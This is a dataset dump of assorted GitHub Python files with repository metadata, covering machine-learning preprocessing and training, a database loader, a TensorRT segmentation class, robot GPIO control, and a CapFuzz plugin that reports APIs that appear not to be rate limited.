比序列长度短的在前面补0\r\n # sentences_array 后面ids_array长度的值替换为ids_array中的值\r\n # sentences_array 前面的值还是原来初始的0,相当于在前面补0\r\n if np.size(ids_array, 1) < seq_lenth:\r\n sentences_array[i, seq_lenth - np.size(ids_array, 1):] = ids_array[0, :]\r\n # 比序列长度长的直接截断,只取序列长度\r\n else:\r\n sentences_array[i, 0:seq_lenth] = ids_array[0, 0:seq_lenth]\r\n\r\n i = i + 1\r\n\r\n return np.array(sentences_array)\r\n\r\n# 准备训练数据,验证数据,测试数据\r\ndef prepare_data(word2id, train_path, val_path, test_path, seq_lenth):\r\n\r\n train_array, train_lable = text_to_array(word2id, seq_lenth, train_path)\r\n val_array, val_lable = text_to_array(word2id, seq_lenth, val_path)\r\n test_array, test_lable = text_to_array(word2id, seq_lenth, test_path)\r\n\r\n train_lable = np.array(train_lable).T\r\n val_lable = np.array(val_lable).T\r\n test_lable = np.array(test_lable).T\r\n\r\n return train_array, train_lable, val_array, val_lable, test_array, test_lable\r\n\r\n# 准备训练数据,验证数据\r\ndef prepare_train_data(word2id, train_path, val_path, seq_lenth):\r\n\r\n train_array, train_lable = text_to_array(word2id, seq_lenth, train_path)\r\n val_array, val_lable = text_to_array(word2id, seq_lenth, val_path)\r\n\r\n train_lable = np.array(train_lable).T\r\n val_lable = np.array(val_lable).T\r\n\r\n return train_array, train_lable, val_array, val_lable\r\n\r\n# 准备训练数据,验证数据\r\ndef prepare_test_data(word2id, test_path, seq_lenth):\r\n\r\n test_array, test_lable = text_to_array(word2id, seq_lenth, test_path)\r\n test_lable = np.array(test_lable).T\r\n return test_array, test_lable\r\n\r\n\r\nif __name__ == '__main__':\r\n # 构建训练集和验证集的词到id表示\r\n build_word2id(save_to_path=Config.word2id_path)\r\n \r\n splist = []\r\n word2id = {}\r\n\r\n # 转换为字典 word : id\r\n with open(Config.word2id_path, encoding='utf-8') as f:\r\n for line in f.readlines():\r\n sp = line.strip().split()\r\n splist.append(sp)\r\n word2id = dict(splist)\r\n\r\n for key in word2id:\r\n word2id[key] = int(word2id[key])\r\n\r\n # 转换为字典 id : word\r\n id2word = {}\r\n for key, value in word2id.items():\r\n id2word[value] = key\r\n\r\n # 构建所有词的词向量\r\n word2vec = build_word2vec(Config.pre_word2vec_path,\r\n word2id, Config.corpus_word2vec_path)\r\n\r\n # 转换句子id表示和标签\r\n train_array, train_lable, \\\r\n val_array, val_lable, \\\r\n test_array, test_label = prepare_data(word2id,\r\n Config.train_path,\r\n Config.val_path,\r\n Config.test_path, \r\n Config.max_sen_len)\r\n\r\n # 保存训练数据,验证数据,测试数据的id表示形式\r\n np.savetxt(Config.train_data_path, train_array, fmt='%d')\r\n np.savetxt(Config.val_data_path, val_array, fmt='%d')\r\n np.savetxt(Config.test_data_path, test_array, fmt='%d')","repo_name":"yzhhome/Sentiment-Analysis-Pytorch","sub_path":"SA_DataProcess.py","file_name":"SA_DataProcess.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"11495992452","text":"import unittest\n\nfrom fbdl.packages import Packages\n\npackages = Packages()\n\npackages['foo'] = [\n {'Path': \"/zero/fbd-foo\"},\n {'Path': \"/zero/one/fbd-foo\"},\n {'Path': \"/zero/one/two/fbd-foo\"},\n]\n\n\npackages['bar'] = [{'Path': \"/some/path/fbd/bar\"}]\n\n\nclass TestGettingRefToPackage(unittest.TestCase):\n def test_get_ref_to_foo(self):\n ref = packages.get_ref_to_pkg(\"zero/fbd-foo\")\n self.assertEqual(ref, packages['foo'][0])\n\n ref = packages.get_ref_to_pkg(\"zero/one/fbd-foo\")\n self.assertEqual(ref, packages['foo'][1])\n\n ref = packages.get_ref_to_pkg(\"two/fbd-foo\")\n self.assertEqual(ref, packages['foo'][2])\n\n def test_get_ref_to_bar(self):\n ref = packages.get_ref_to_pkg(\"bar\")\n self.assertEqual(ref, packages['bar'][0])\n","repo_name":"Functional-Bus-Description-Language/PyFBDL","sub_path":"fbdl/tests/packages/test_get_ref_to_package.py","file_name":"test_get_ref_to_package.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31574066294","text":"import time\nimport threading\ndef fun1(a):\n print(\"fun1 start\",time.ctime())\n print(\"我是参数\",a)\n time.sleep(2)\n print(\"fun1 end:\",time.ctime())\ndef fun2(a,b):\n print(\"fun2 start\", time.ctime())\n print(\"我是参数\", a,\" ,我是参数\",b)\n time.sleep(3)\n print(\"fun1 end:\", time.ctime())\ndef main():\n print(\"start doing\")\n t1=threading.Thread(target=fun1,args=(\"韩广阳\",))\n t1.start()\n\n t2=threading.Thread(target=fun2,args=(\"吴亦凡\",\"鹿晗\"))\n t2.start()\n\n t1.join()\n t2.join()\n\n print(\"end doing\")\nif __name__==\"__main__\":\n main()\n","repo_name":"1361217049/python","sub_path":"多线程/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"15159742869","text":"\r\n#%%\r\n\r\nimport sys\r\n\r\nsys.setrecursionlimit(5001)\r\n\r\nfib = [0]*5001\r\n\r\ndef compute(n):\r\n if n == 0:\r\n return 0\r\n elif n == 1:\r\n return 1\r\n elif fib[n] != 0:\r\n return fib[n]\r\n else:\r\n fib[n] = compute(n-1) + compute(n-2)\r\n return fib[n]\r\n\r\nwhile True:\r\n try:\r\n n = int(input())\r\n \r\n print(\"The Fibonacci number for \" + str(n) + \" is \" + str(compute(n)))\r\n except EOFError:\r\n break\r\n ","repo_name":"TashreefMuhammad/UVA_Problem_Solutions","sub_path":"UVA_00495.py","file_name":"UVA_00495.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"2736739229","text":"from keras.datasets import cifar10, fashion_mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n(X_train, y_train), (X_test, y_test) = fashion_mnist.load_data()\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n# Display the first 10 images with their corresponding class names\nplt.figure(figsize=(10, 10))\nfor i in range(10):\n plt.subplot(2, 5, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(X_train[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[y_train[i]])\nplt.show()\n\nX_train = X_train.astype('float32') / 255\nX_test = X_test.astype('float32') / 255\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)))\nmodel.add(MaxPooling2D((2, 2)))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D((2, 2)))\nmodel.add(Conv2D(128, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D((2, 2)))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation='softmax'))\n\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\nmodel.fit(X_train, y_train, epochs=10, batch_size=32)\n\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"Accuracy: %.2f%%\" % (scores[1] * 100))\n\nmodel.save('fmnist.h5')\n","repo_name":"kiIIer/kpi-4","sub_path":"machine-l/lab/lab-5-30.04.2023/skynet/fmnist.py","file_name":"fmnist.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"5423382108","text":"import os.path as path\nimport mysql.connector, sys, json, time\nfrom constants import *\n\nwith open(path.join(PROCESSED_PATH, 'cohort_hour_staged.csv'), 'r') as csv_data:\n with open('.dbconfig.json') as cf:\n cfgs = json.loads(cf.read())\n mydb = mysql.connector.connect(**cfgs)\n cursor = mydb.cursor()\n\n i = 0\n t0 = time.time()\n for row in csv_data:\n i += 1\n if i % 10000 == 0:\n print(\"row: \", i)\n cursor.execute(\n \"INSERT INTO cohort_hour_staged(SUBJECT_ID, HADM_ID, age, ETHNICITY, GENDER, time, SCr, VALUEUOM, BASELINE, RATIO, STAGE) VALUES(%s)\" % row\n )\n #close the connection to the database.\n mydb.commit()\n cursor.close()\n t1 = time.time()\n print(\"took %f s\" % (t1 - t0))\n print(\"total rows: \", i)\n","repo_name":"ramsir3/AMIA2019","sub_path":"loadCSV.py","file_name":"loadCSV.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"13532005035","text":"from utils import escape, repeat_to_length\n\nDEFAULT_HARVESTERS = ['MarkdownUrlHarvester,harvest.harvesters']\n\n\ndef harvest(text, harvesters=DEFAULT_HARVESTERS):\n instances = [load_class(namespace) for namespace in harvesters]\n\n display_text = ''\n display_html = ''\n\n entities = []\n\n current_text = text\n\n for instance in instances:\n e = instance.harvest(current_text)\n\n current_position = 0\n for entity in e:\n entities.append(entity)\n current_position = entity.start_index\n l = len(entity.original_text)\n replacement = repeat_to_length(' ', l)\n current_text = current_text[:current_position] + \\\n replacement + current_text[current_position + l:]\n\n current_index = 0\n for entity in entities:\n display_html = display_html + escape(text[current_index:entity.start_index]) + entity.display_html\n display_text = display_text + escape(text[current_index:entity.start_index]) + entity.display_text\n current_index = entity.end_index\n\n display_text = display_text + escape(text[current_index:])\n display_html = display_html + escape(text[current_index:])\n\n return {\n 'display_text': display_text,\n 'display_html': display_html,\n }\n\n\ndef load_class(namespace):\n module = __import__(namespace.split(',')[1])\n return getattr(module, namespace.split(',')[0])()\n","repo_name":"jpennell/harvest","sub_path":"harvest/harvest.py","file_name":"harvest.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"71668760691","text":"#!/usr/bin/env python\nfrom diagrams import Diagram\nfrom diagrams.onprem.database import PostgreSQL\nfrom diagrams.onprem.database import MongoDB\nfrom diagrams.onprem.compute import Server\nfrom diagrams.custom import Custom\n\nwith Diagram(\"Sample Bank Architecture\", show=False):\n maps = Custom(\"Google Maps API\", \"./maps.png\")\n\n dns = Server(\"DNS\")\n\n front = Custom(\"Frontend\", \"./react.png\")\n\n am = Custom(\"Account Manager\", \"./node.png\")\n ps = Custom(\"Plan Simulator\", \"./node.png\")\n bf = Custom(\"Branch Finder\", \"./ts.png\")\n\n db1 = PostgreSQL(\"PostgreSQL\")\n db2 = PostgreSQL(\"PostgreSQL\")\n db3 = MongoDB(\"MongoDB\")\n\n dns >> front >> am\n front >> ps\n front >> bf\n\n am >> db1\n ps >> db2\n bf >> db3\n bf >> maps","repo_name":"amirelemam/sample-bank-webapp","sub_path":"architecture-diagram/architecture-diagram.py","file_name":"architecture-diagram.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"35016120523","text":"import os,sys,codecs\nfrom random import randint\n\nsens=codecs.open(os.path.abspath(sys.argv[1]),'r').read().strip().split('\\n\\n')\nneeded=int(sys.argv[2])\nwriter=codecs.open(os.path.abspath(sys.argv[3]),'w')\ngenerated=set()\n\ncount=0\n\nwhile count -0.5:\n\t\t\tGPIO.output(37,GPIO.LOW)\n\t\t\tGPIO.output(35,GPIO.LOW)\n\t\t\tGPIO.output(33,GPIO.LOW)\n\t\t\tGPIO.output(31,GPIO.LOW)\n\t\t\tprint('##### Stop #####')\n\t\telif e.axis == 0 and e.value >= 0.5:\n\t\t\tGPIO.output(37,GPIO.LOW)\n\t\t\tGPIO.output(35,GPIO.HIGH)\n\t\t\tGPIO.output(33,GPIO.HIGH)\n\t\t\tGPIO.output(31,GPIO.LOW)\n\t\t\tprint('Right')\n\t\telif e.axis == 0 and e.value <= -0.5:\n\t\t\tGPIO.output(37,GPIO.HIGH)\n\t\t\tGPIO.output(35,GPIO.LOW)\n\t\t\tGPIO.output(33,GPIO.LOW)\n\t\t\tGPIO.output(31,GPIO.HIGH)\n\t\t\tprint('Left')\n\t\telif e.axis == 1 and e.value >= 0.5:\n\t\t\tGPIO.output(37,GPIO.LOW)\n\t\t\tGPIO.output(35,GPIO.HIGH)\n\t\t\tGPIO.output(33,GPIO.LOW)\n\t\t\tGPIO.output(31,GPIO.HIGH)\n\t\t\tprint('Down')\n\t\telif e.axis == 1 and e.value <= -0.5:\n\t\t\tGPIO.output(37,GPIO.HIGH)\n\t\t\tGPIO.output(35,GPIO.LOW)\n\t\t\tGPIO.output(33,GPIO.HIGH)\n\t\t\tGPIO.output(31,GPIO.LOW)\n\t\t\tprint('Up')\n\t\n\te = event.wait()\n\npwm.stop()\nGPIO.cleanup()","repo_name":"7enTropy7/cypher_droid","sub_path":"Flask and Hardware/responsive_control.py","file_name":"responsive_control.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"27547300379","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom face_alignment import FaceAlignment, LandmarksType\nfrom .utils.bfm import load_lm3d\nfrom .utils.align_batch import align_img_batch\n\n\nclass Preprocessor(nn.Module):\n def __init__(self, bfm_folder, **kwargs):\n super(Preprocessor, self).__init__()\n self.lm3d_std = load_lm3d(bfm_folder)\n self.device = 'cpu'\n self.kwargs = kwargs\n self.fa = FaceAlignment(LandmarksType._2D, device=self.device, **kwargs)\n \n def to(self, device):\n self.device = device\n self.fa = FaceAlignment(LandmarksType._2D, device=self.device, **self.kwargs)\n return self\n \n def cuda(self):\n self.device = 'cuda'\n self.fa = FaceAlignment(LandmarksType._2D, device=self.device, **self.kwargs)\n return self\n \n def cpu(self):\n self.device = 'cpu'\n self.fa = FaceAlignment(LandmarksType._2D, device=self.device, **self.kwargs)\n return self\n\n def extract_bboxs(self, x):\n \"\"\"\n Extract bounding boxes from input frames.\n\n Args:\n x (torch.tensor): Input frames in (N, H, W, C)\n Returns:\n list[np.array]: Bounding boxes in (4, )\n \"\"\"\n x = x.permute(0, 3, 1, 2).float().to(self.device)\n return self.fa.face_detector.detect_from_batch(x)\n \n def extract_keypoints(self, x):\n \"\"\"\n Extract keypoints from input frames.\n\n Args:\n x (torch.tensor): Input frames in (N, H, W, C)\n Returns:\n list[np.array]: Keypoints in (68, 2)\n \"\"\"\n x = x.permute(0, 3, 1, 2).float().to(self.device)\n return self.fa.get_landmarks_from_batch(x)\n\n def align_and_recrop(self, x):\n \"\"\"\n Perform face alignment and recrop the input frames.\n\n Args:\n x (torch.tensor): Input frames in (N, H, W, C)\n Returns:\n torch.tensor: Transform parameters in (N, 5)\n torch.tensor: Aligned and recropped frames in (N, H, W, C)\n torch.tensor: Aligned and recropped landmarks in (N, 68, 2)\n torch.tensor: Aligned and recropped masks in (N, H, W)\n \"\"\"\n keypoints = self.extract_keypoints(x)\n keypoints = np.stack([e if e is not None else -1 * np.ones((68, 2)) for e in keypoints])\n trans_params, new_images, new_landmarks, new_masks = align_img_batch(\n x,\n torch.from_numpy(keypoints).to(self.device),\n torch.from_numpy(self.lm3d_std).to(self.device),\n )\n return trans_params, new_images, new_landmarks, new_masks\n \n def prepare_input(self, x):\n \"\"\"\n Convert input frames to the format required by the network. The device is not changed.\n\n Args:\n x (torch.tensor): Input frames in (N, H, W, C)\n Returns:\n torch.tensor: Normalized input frames in (N, C, H, W)\n \"\"\"\n x = x.permute(0, 3, 1, 2).float()\n if x.shape[2] != 224 or x.shape[3] != 224:\n x = F.interpolate(x, size=(224, 224), mode='bicubic', align_corners=False)\n x /= 255.\n return x\n","repo_name":"dc3ea9f/face_utils","sub_path":"face_utils/recons/DeepFace3DRecon/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"17475147005","text":"import capfuzz.settings as settings\nfrom capfuzz.core.utils import (\n HTTPDumper\n)\nfrom capfuzz.fuzzer.plugins.utils.helper import (\n get_content_type_lower\n)\napi_reason = {}\napi_code = {}\n\ndef response_analyzer(flow, options):\n \"\"\"\n Totally Async\n Reimplement\n print (api_req)\n \"\"\"\n\n global api_reason, api_code\n meta = flow.metadata[\"fuzz_api\"]\n res = flow.response\n write = options[\"write\"]\n api_req = meta[\"api_rate_limit\"]\n api_name = meta[\"api_name\"]\n #Why 5 we are not sure whats the order\n if api_req in [1, 2, 3, 4, 5]:\n api_reason[api_name] = flow.response.reason\n api_code[api_name] = flow.response.status_code\n if api_req == settings.RATELIMIT_REQ_NOS - 1:\n if api_reason[api_name] == flow.response.reason or api_code[api_name] == flow.response.status_code:\n write(\"\\n[VULN] API may not be rate limited (Requests %s) - %s\" %\n (str(api_req + 1), flow.request.url), type=\"danger\")\n http_dumper = HTTPDumper(options[\"report_file\"], False)\n http_dumper.dump(\"===========================\")\n http_dumper.dump(\"API may not be rate limited\")\n http_dumper.dump(\"===========================\")\n http_dumper.save_http(flow)\n\n","repo_name":"MobSF/CapFuzz","sub_path":"capfuzz/fuzzer/plugins/api/api_resp.py","file_name":"api_resp.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"20"} +{"seq_id":"17009607359","text":"import numpy as np\nfrom database import *\n\n\ndef synchronize(vec_real, vec_pred):\n if len(vec_real) == len(vec_pred):\n return\n\n if len(vec_real) < len(vec_pred):\n res = []\n res.extend(vec_real)\n res.extend(vec_pred[len(vec_real)+1:])\n vec_real = np.array(res)\n else:\n res = []\n res.extend(vec_pred)\n res.extend(vec_real[len(vec_pred)+1])\n vec_pred = np.array(res)\n\n return vec_real, vec_pred\n\n\ndef equals_of_vectors(vector_real, vector_predict):\n if len(vector_predict) != len(vector_predict):\n vector_real, vector_predict = synchronize(vector_real, vector_predict)\n\n norm1 = np.linalg.norm(vector_real, 2)\n norm2 = np.linalg.norm(vector_predict, 2)\n\n return (norm1 - norm2)/(norm1 + norm2)\n\n\ndef predictDeppression(patient_id):\n real = np.array([])\n pred = np.array([])\n answerlogs = AnswerLogRecords.select().where(AnswerLogRecords.patient_id == patient_id)\n for answer in answerlogs:\n question = Questions.select().where(Questions.id == answer.real_emotion).get()\n np.append(real, question.sentiment_id)\n # print(answer.real_emotion)\n\n print(real)\n changelogs = ChangeLogRecords.select().where(ChangeLogRecords.patient_id == patient_id)\n for change in changelogs:\n print(change.current_emotion_id)\n question = Questions.select().where(Questions.id == change.current_emotion_id).get()\n np.append(pred, question.Sentiment_id)\n print(question.sentiment_id)\n # print(change.current_emotion_id)\n return real,pred\n\nif __name__ == '__main__':\n real = np.array([1, 2, 1, 2,1,0,1,1,2,0,0,2,1,2,2,1,2,0,2,1])\n pred = np.array([1, 2, 1, 2,1,0,0,1,2,1,0,1,1,0,2,1,2,1,2,1])\n print(equals_of_vectors(real, pred))\n","repo_name":"Iorgen/NeuroHackaton","sub_path":"Face_recog/vectors.py","file_name":"vectors.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23946259333","text":"# -*- coding: utf-8 -*-\n\nfrom plugin_package.content_package import ContentPackage\nfrom gluon.tools import PluginManager\nfrom plugin_ckeditor import CKEditor\n\nif False:\n from gluon import current\n from gluon import Field\n response = current.response\n request = current.request\n T = current.T\n from db import db, auth\n\n\ndef _():\n plugins = PluginManager('package', app=None)\n if plugins.package.app is not None:\n # this will register the the application on content/type\n plugins.package.app.registerContentType('package', ContentPackage())\n\n if not hasattr(db, 'plugin_package_content'):\n editor = CKEditor(db=db)\n tbl = db.define_table(\n 'plugin_package_content',\n Field('item_list', 'list:string'),\n Field('description', 'text'),\n Field('item_id', 'string', length=64),\n auth.signature,\n )\n tbl.item_id.writable = False\n tbl.item_id.readable = False\n tbl.item_list.writable = False\n tbl.item_list.readable = False\n tbl.description.label = T('Description')\n tbl.description.widget = editor.widget\n tbl._enable_record_versioning()\n\n # add a callback to the item table for updating the item list of\n # the package on item deletion.\n def plugin_package_callback(s):\n item = s.select().first()\n # this are the packages with contains the item to delete\n pkgs = db(\n db.plugin_package_content.item_list.contains(\n item.unique_id)\n ).select()\n for pkg in pkgs:\n # remove the item from the package\n pkg.item_list.remove(item.unique_id)\n pkg.update_record()\n\n return False\n db.item._before_delete.insert(0, plugin_package_callback)\n\n_()\n","repo_name":"ybenitezf/nstock","sub_path":"models/plugin_package.py","file_name":"plugin_package.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"20"} +{"seq_id":"18179493828","text":"\"\"\"\nEscribir un programa que guarde en un diccionario los precios de las frutas de la tabla, pregunte al usuario por una fruta, un número de kilos y muestre por pantalla el precio de ese número de kilos de fruta. Si la fruta no está en el diccionario debe mostrar un mensaje informando de ello. \n\"\"\"\n\ndef comprobar_fruta(precio_frutas, fruta):\n return precio_frutas.get(fruta)\n\nif __name__ == \"__main__\":\n\n precio_frutas = {\"PLATANO\" : 1.35, \"MANZANA\" : 0.80, \"PERA\" : 0.85, \"NARANJA\" : 0.70}\n\n #Entrada\n fruta = input(\"Elige una fruta de la lista(PLATANO-MANZANA-PERA-NARANJA): \")\n fruta = fruta.upper()\n\n #Procesar\n resultado = comprobar_fruta(precio_frutas, fruta)\n\n if resultado:\n kilo = float(input(\"Introduce los kilos de fruta: \"))\n precio = resultado * kilo\n \n #Salida\n print(\"Has seleccionado \" + str(kilo) + \" kg de \" + fruta + \", son \" + str(precio) + \" euros\" ) \n else:\n #Salida\n print(\"No disponemos de esa fruta, por favor elige una de la lista!!\")\n \n\n ","repo_name":"IES-Rafael-Alberti/2324-u3-diccionarios-eloyesteban","sub_path":"src/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"39350331737","text":"import math \n\ndef solution(str1, str2):\n d = {}\n for i in range(len(str1)-1):\n s = str1[i:i+2]\n s = s.lower()\n if s.isalpha():\n if d.get(s):\n d[s][0] += 1\n else:\n d[s] = [1, 0]\n for i in range(len(str2)-1):\n s = str2[i:i+2]\n s = s.lower()\n if s.isalpha():\n if d.get(s):\n d[s][1] += 1\n else:\n d[s] = [0, 1]\n \n i = 0; u = 0\n for keyword in d:\n i += min(d[keyword])\n u += max(d[keyword])\n \n if u == 0: \n answer = 65536\n else: \n answer = math.floor((i/u) * 65536)\n \n return answer\n","repo_name":"jaejae2374/CodingTest","sub_path":"kakao/Cache/뉴스클러스터링/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31462832182","text":"import argparse\nfrom segcolors import colors\nimport numpy as np\nimport tensorrt as trt\nimport pycuda.driver as cuda\nimport pycuda.autoinit\nimport pdb\nimport os\nimport cv2\nimport time\n\nclass TRTSegmentor(object):\n\tdef __init__(self, \n\t\tonnxpath, \n\t\tcolors,\n\t\tinsize=(640,360),\n\t\tmaxworkspace=(1<<25), \n\t\tprecision='FP16', \n\t\tdevice='GPU', \n\t\tmax_batch_size=1, \n\t\tcalibrator=None, \n\t\tdla_core=0\n\t\t):\n\t\tself.onnxpath=onnxpath\n\t\tself.enginepath=onnxpath+f'.{precision}.{device}.{dla_core}.{max_batch_size}.trt'\n\t\t#filename to be used for saving and reading engines\n\t\tself.nclasses=21\n\t\tself.pp_mean=np.array([0.485, 0.456, 0.406]).reshape((1,1,3))\n\t\tself.pp_stdev=np.array([0.229, 0.224, 0.225]).reshape((1,1,3))\n\t\t#mean and stdev for pre-processing images, see torchvision documentation\n\t\tself.colors=colors #colormap for 21 classes of Pascal VOC\n\t\t\n\t\tself.in_w=insize[0]\n\t\tself.in_h=insize[1] #width, height of input images\n\n\t\t#here we specify very important engine build flags\n\t\tself.maxworkspace=maxworkspace\n\t\tself.max_batch_size=max_batch_size\n\t\t\n\t\tself.precision_str=precision\n\t\tself.precision={'FP16':0, 'INT8':1, 'FP32': -1}[precision]\n\t\t#mapping strings to tensorrt precision flags\n\n\t\tself.device={'GPU':trt.DeviceType.GPU, 'DLA': trt.DeviceType.DLA}[device]\n\t\t#mapping strings to tensorrt device types\n\n\t\tself.dla_core=dla_core #used only if DLA device is selected\n\t\tself.calibrator=calibrator #used only for INT8 precision\n\t\tself.allowGPUFallback=3 #used only if DLA is selected\n\t\t\n\t\tself.engine, self.logger= self.parse_or_load()\n\t\t\n\t\tself.context=self.engine.create_execution_context()\n\t\tself.trt2np_dtype={'FLOAT':np.float32, 'HALF':np.float16, 'INT8':np.int8}\n\t\tself.dtype = self.trt2np_dtype[self.engine.get_binding_dtype(0).name]\n\t\t\n\t\tself.allocate_buffers(np.zeros((1,3,self.in_h,self.in_w), dtype=self.dtype))\n\n\tdef allocate_buffers(self, image):\n\t\tpass\n\t\tinsize=image.shape[-2:]\n\t\toutsize=[insize[0] >> 3, insize[1] >> 3]\n\t\tself.output=np.empty((self.nclasses,outsize[0],outsize[1]), dtype=self.dtype)\n\t\tself.d_input=cuda.mem_alloc(image.nbytes)\n\t\tself.d_output=cuda.mem_alloc(self.output.nbytes)\n\n\t\tself.bindings=[int(self.d_input), int(self.d_output)]\n\t\t#print(self.bindings)\n\t\tself.stream=cuda.Stream()\n\n\tdef preprocess(self, img):\n\t\timg=cv2.resize(img,(self.in_w,self.in_h))\n\t\timg=img[...,::-1]\n\t\timg=img.astype(np.float32)/255\n\t\timg=(img-self.pp_mean)/self.pp_stdev\n\n\t\timg=np.transpose(img,(2,0,1))\n\t\timg=np.ascontiguousarray(img[None,...]).astype(self.dtype)\n\n\t\treturn img\n\n\tdef infer(self, image, benchmark=False):\n\t\t\"\"\"\n\t\timage: unresized,\n\t\t\"\"\"\n\t\tintensor=self.preprocess(image)\n\n\t\tstart=time.time()\n\n\t\tcuda.memcpy_htod_async(self.d_input, intensor, self.stream)\n\t\tself.context.execute_async_v2(self.bindings, self.stream.handle, None)\n\t\tcuda.memcpy_dtoh_async(self.output, self.d_output, self.stream)\n\n\t\tself.stream.synchronize()\n\t\t\n\t\tif benchmark:\n\t\t\tduration=(time.time()-start)\n\t\t\treturn duration\n\n\tdef infer_async(self, intensor):\n\t\t#intensor should be preprocessed tensor\n\t\tcuda.memcpy_htod_async(self.d_input, intensor, self.stream)\n\t\tself.context.execute_async_v2(self.bindings, self.stream.handle, None)\n\t\tcuda.memcpy_dtoh_async(self.output, self.d_output, self.stream)\n\n\tdef draw(self, img):\n\t\tshape=(img.shape[1],img.shape[0])\n\t\tsegres=np.transpose(self.output,(1,2,0)).astype(np.float32)\n\n\t\tsegres=cv2.resize(segres, shape)\n\t\tmask=segres.argmax(axis=-1)\n\t\tcolored=self.colors[mask]\n\n\t\tdrawn=cv2.addWeighted(img, 0.5, colored, 0.5, 0.0)\n\t\treturn drawn\n\n\tdef infervideo(self, infile):\n\t\tsrc=cv2.VideoCapture(infile)\n\t\tret,frame=src.read()\n\t\tfps=0.0\n\n\t\tif not ret:\n\t\t\tprint('Cannot read file/camera: {}'.format(infile))\n\n\t\twhile ret:\n\t\t\tduration=self.infer(frame, benchmark=True)\n\t\t\tdrawn=self.draw(frame)\n\t\t\tcv2.imshow('segmented', drawn)\n\t\t\tk=cv2.waitKey(1)\n\t\t\tif k==ord('q'):\n\t\t\t\tbreak\n\n\t\t\tfps=0.9*fps+0.1/(duration)\n\t\t\tprint('FPS=:{:.2f}'.format(fps))\n\t\t\tret,frame=src.read()\n\n\tdef parse_or_load(self):\n\t\tlogger= trt.Logger(trt.Logger.INFO)\n\t\t#we want to show logs of type info and above (warnings, errors)\n\t\t\n\t\tif os.path.exists(self.enginepath):\n\t\t\tlogger.log(trt.Logger.INFO, 'Found pre-existing engine file')\n\t\t\twith open(self.enginepath, 'rb') as f:\n\t\t\t\trt=trt.Runtime(logger)\n\t\t\t\tengine=rt.deserialize_cuda_engine(f.read())\n\n\t\t\treturn engine, logger\n \n\t\telse: #parse and build if no engine found\n\t\t\twith trt.Builder(logger) as builder:\n\t\t\t\tbuilder.max_batch_size=self.max_batch_size\n\t\t\t\t#setting max_batch_size isn't strictly necessary in this case\n\t\t\t\t#since the onnx file already has that info, but its a good practice\n\t\t\t\t\n\t\t\t\tnetwork_flag = 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)\n\t\t\t\t\n\t\t\t\t#since the onnx file was exported with an explicit batch dim,\n\t\t\t\t#we need to tell this to the builder. We do that with EXPLICIT_BATCH flag\n\t\t\t\t\n\t\t\t\twith builder.create_network(network_flag) as net:\n\t\t\t\t\n\t\t\t\t\twith trt.OnnxParser(net, logger) as p:\n\t\t\t\t\t\t#create onnx parser which will read onnx file and\n\t\t\t\t\t\t#populate the network object `net`\t\t\t\t\t\n\t\t\t\t\t\twith open(self.onnxpath, 'rb') as f:\n\t\t\t\t\t\t\tif not p.parse(f.read()):\n\t\t\t\t\t\t\t\tfor err in 